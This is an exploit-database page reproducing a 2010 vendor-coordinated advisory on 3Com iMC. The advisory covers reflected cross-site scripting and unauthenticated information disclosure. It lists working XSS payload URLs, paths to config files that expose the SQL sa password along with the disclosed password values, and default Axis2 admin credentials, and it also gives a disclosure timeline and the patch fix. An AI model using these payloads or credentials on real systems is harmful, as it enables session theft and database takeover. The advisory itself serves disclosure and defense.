Menu

Search for hundreds of thousands of exploits

"3Com* iMC (Intelligent Management Center) - Cross-Site Scripting / Information Disclosure Flaws"

Author

Exploit author

"Richard Brain"

Platform

Exploit platform

windows

Release date

Exploit published date

2010-05-21

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
PR10-02: Various XSS and information disclosure flaws within 3Com* iMC (Intelligent Management Center)

* On the 12th April 2010 Hewlett Packard completed its acquisition of 3Com

Vulnerability found: 29th January 2010

Vendor informed:  1st February 2010

Vulnerability fixed: 13th May 2010

Severity: Medium/High

Description: 

3Com's iMC (Intelligent Management Centre) provides professional management of 3Com and third party network devices, the IMC is normally accessed using a web browser over port 8080. Various IMC pages are vulnerable to a reflective XSS attack, including the login page. Various pages also disclose information including the SQL sa account password which might be used to assist in carrying out further attacks. 


Note: tested on 3Com IMC running on Windows and Microsoft SQL 2005

Version 3.3.9   R2 606 29 Sept 2009
Version 3.3 SP1 R2 606 15 Dec 2009


The following demonstrate the XSS flaws (no authentication needed):

1) The login page is vulnerable to a vanilla XSS


http://target-domain.foo:8080/imc/login.jsf?loginForm%3a_link_hidden_=&javax.faces.ViewState=%3C/textarea%3E%3Cscript%3Ealert(1)%3C/script%3E




2) IE only

http://target-domain.foo:8080/imc/dwr/call/plaincall/blah?callCount=<script>alert(1)</script>
http://target-domain.foo:8080/imc/dwr/interface/<script>alert(1)</script>



Consequences: 

An attacker may be able to cause execution of malicious scripting code in the browser of a user who clicks on a link to a 3Com IMC-based site. Such code would run within the security context of the target domain. This type of attack can result in non-persistent defacement of the target site, or the redirection of confidential information (i.e.: session IDs) to unauthorised third parties.

----------------------------------------------------------------------------------------------------------------------------------------------

The following demonstrate the Information disclosure flaws (no authentication needed)

1) The SQL sa account password can be remotely retrieved, by knowing the path of the  configuration file.

http://target-domain.foo:8080/imc/reportscript/sqlserver/deploypara.properties
http://target-domain.foo:8080/rpt/reportscript/sqlserver/deploypara.properties
http://target-domain.foo:8080/imc/reportscript/oracle/deploypara.properties

The sql file contains the following information:-
report.db.server.name=127.0.0.1
report.db.server.sa.pass=iMC-Install2005
report.db.server.user.pass=sqlsql

2) Information about the web services supported is publically disclosed by the Axis2 console.
http://target-domain.foo:8080/imcws/

Including services configuration
http://target-domain.foo:8080/imcws/services/listServices

The Axis2 console has the default credentials - User=admin Password=axis
http://target-domain.foo:8080/imcws/axis2-admin/

The Admin console allows machine configuration to be viewed and changed and new services uploaded.

Consequences: 

An attacker may be able to obtain additional information on the machines configuration, and use this information for more advanced attacks.


Fix:
Ensure that at least patch 3.3SP2 (R2606P13) has been installed. 

References: 

http://www.procheckup.com/Vulnerabilities.php



Credits: Richard Brain of ProCheckUp Ltd (www.procheckup.com)


Legal:

Copyright 2010 Procheckup Ltd. All rights reserved.

Permission is granted for copying and circulating this Bulletin to the Internet community for the purpose of alerting them to problems, if and only if, the Bulletin is not edited or changed in any way, is attributed to Procheckup, and provided such reproduction and/or distribution is performed for non-commercial purposes.

Any other use of this information is prohibited. Procheckup is not liable for any misuse of this information by any third party.
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2011-10-18 "Check Point UTM-1 Edge and Safe 8.2.43 - Multiple Vulnerabilities" remote hardware "Richard Brain"
2011-05-16 "Mitel Audio and Web Conferencing 4.4.3.0 - Multiple Cross-Site Scripting Vulnerabilities" webapps asp "Richard Brain"
2011-05-09 "Keyfax Customer Response Management 3.2.2.6 - Multiple Cross-Site Scripting Vulnerabilities" webapps asp "Richard Brain"
2011-05-05 "BMC Remedy Knowledge Management 7.5.00 - Default Account / Multiple Cross-Site Scripting Vulnerabilities" webapps jsp "Richard Brain"
2011-05-05 "BMC Dashboards 7.6.01 - Cross-Site Scripting / Information Disclosure" webapps jsp "Richard Brain"
2010-12-21 "WordPress Plugin Mediatricks Viva Thumbs - Multiple Information Disclosure Vulnerabilities" webapps php "Richard Brain"
2010-12-15 "HP Insight Diagnostics Online Edition 8.4 - 'search.php' Cross-Site Scripting" webapps php "Richard Brain"
2010-12-14 "BlogCFC 5.9.6.001 - Multiple Cross-Site Scripting Vulnerabilities" webapps php "Richard Brain"
2010-12-13 "Mura CMS - Multiple Cross-Site Scripting Vulnerabilities" webapps cfm "Richard Brain"
2010-12-03 "DotNetNuke 5.5.1 - 'InstallWizard.aspx' Cross-Site Scripting" webapps asp "Richard Brain"
2010-06-09 "Juniper Networks SA2000 SSL VPN Appliance - 'welcome.cgi' Cross-Site Scripting" remote hardware "Richard Brain"
2010-05-21 "3Com* iMC (Intelligent Management Center) - Traversal File Retrieval" webapps windows "Richard Brain"
2010-05-21 "3Com* iMC (Intelligent Management Center) - Cross-Site Scripting / Information Disclosure Flaws" webapps windows "Richard Brain"
2010-05-21 "Apache Axis2 Administration Console - (Authenticated) Cross-Site Scripting" webapps multiple "Richard Brain"
2010-01-28 "CommonSpot Server - '/utilities/longproc.cfm' Cross-Site Scripting" webapps cfm "Richard Brain"
2010-01-27 "HP System Management Homepage 3.0.2 - 'servercert' Cross-Site Scripting" remote multiple "Richard Brain"
2010-01-27 "SAP BusinessObjects 12 - URI redirection / Cross-Site Scripting" remote multiple "Richard Brain"
2009-09-25 "Activedition - '/activedition/aelogin.asp' Multiple Cross-Site Scripting Vulnerabilities" webapps asp "Richard Brain"
2008-11-11 "Sun Java System Identity Manager 6.0/7.x - Multiple Vulnerabilities" webapps jsp "Richard Brain"
2008-04-23 "RSA Authentication Agent for Web 5.3 - Open Redirection" remote windows "Richard Brain"
2008-02-28 "Juniper Networks Secure Access 2000 Web - Root Full Path Disclosure" webapps cgi "Richard Brain"
2008-02-28 "Juniper Networks Secure Access 2000 - 'rdremediate.cgi' Cross-Site Scripting" remote hardware "Richard Brain"
2007-11-30 "F5 Networks FirePass 4100 SSL VPN - 'My.Logon.php3' Cross-Site Scripting" remote hardware "Richard Brain"
2007-08-30 "Absolute Poll Manager XE 4.1 - 'xlaapmview.asp' Cross-Site Scripting" webapps asp "Richard Brain"
2007-02-19 "Spyce 2.1.3 - '/spyce/examples/formtag.spy' Multiple Cross-Site Scripting Vulnerabilities" webapps php "Richard Brain"
2007-02-19 "Spyce 2.1.3 - 'spyce/examples/request.spy?name' Cross-Site Scripting" webapps php "Richard Brain"
2007-02-19 "Spyce 2.1.3 - '/docs/examples/redirect.spy' Multiple Cross-Site Scripting Vulnerabilities" webapps php "Richard Brain"
2007-02-19 "Spyce 2.1.3 - 'docs/examples/handlervalidate.spy?x' Cross-Site Scripting" webapps php "Richard Brain"
2007-02-19 "Spyce 2.1.3 - 'spyce/examples/getpost.spy?Name' Cross-Site Scripting" webapps php "Richard Brain"
2007-02-19 "Spyce 2.1.3 - spyce/examples/automaton.spy Direct Request Error Message Information Disclosure" webapps php "Richard Brain"
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.